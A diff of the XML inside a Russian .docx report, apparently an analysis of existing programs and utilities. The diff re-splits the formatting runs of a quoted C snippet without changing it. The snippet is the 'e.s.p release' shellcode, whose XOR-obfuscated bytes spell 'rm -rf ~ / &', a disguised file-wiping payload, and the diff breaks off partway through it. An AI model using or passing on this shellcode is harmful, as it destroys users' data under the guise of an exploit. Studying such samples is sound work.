--- a/Анализ устройства текущих программ и утилит.docx
+++ b/Анализ устройства текущих программ и утилит.docx
@@ -2276,23 +2276,140 @@
           <w:szCs w:val="28"/>
           <w:u w:val="single"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>char esp[] __attribute__ ((section(".text"))) /* e.s.p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>char</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>[] __</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>attribute</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>__ ((</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>section</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>(".</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>text</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve">"))) /* </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -2303,13 +2420,20 @@
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>release */</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:lang w:val="en-US"/>
+        <w:t>release</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> */</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -2318,15 +2442,268 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="C7254E"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>= "\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xeb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>31\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>0\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>50\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>54\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>83\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xec</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>64\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>68"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -2335,15 +2712,234 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="C7254E"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xff</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>68\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xdf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>0\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xdf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xd</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>9\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>68\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>99"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -2352,15 +2948,251 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
           <w:color w:val="C7254E"/>
           <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>"\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>xdf</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>81\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>68\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
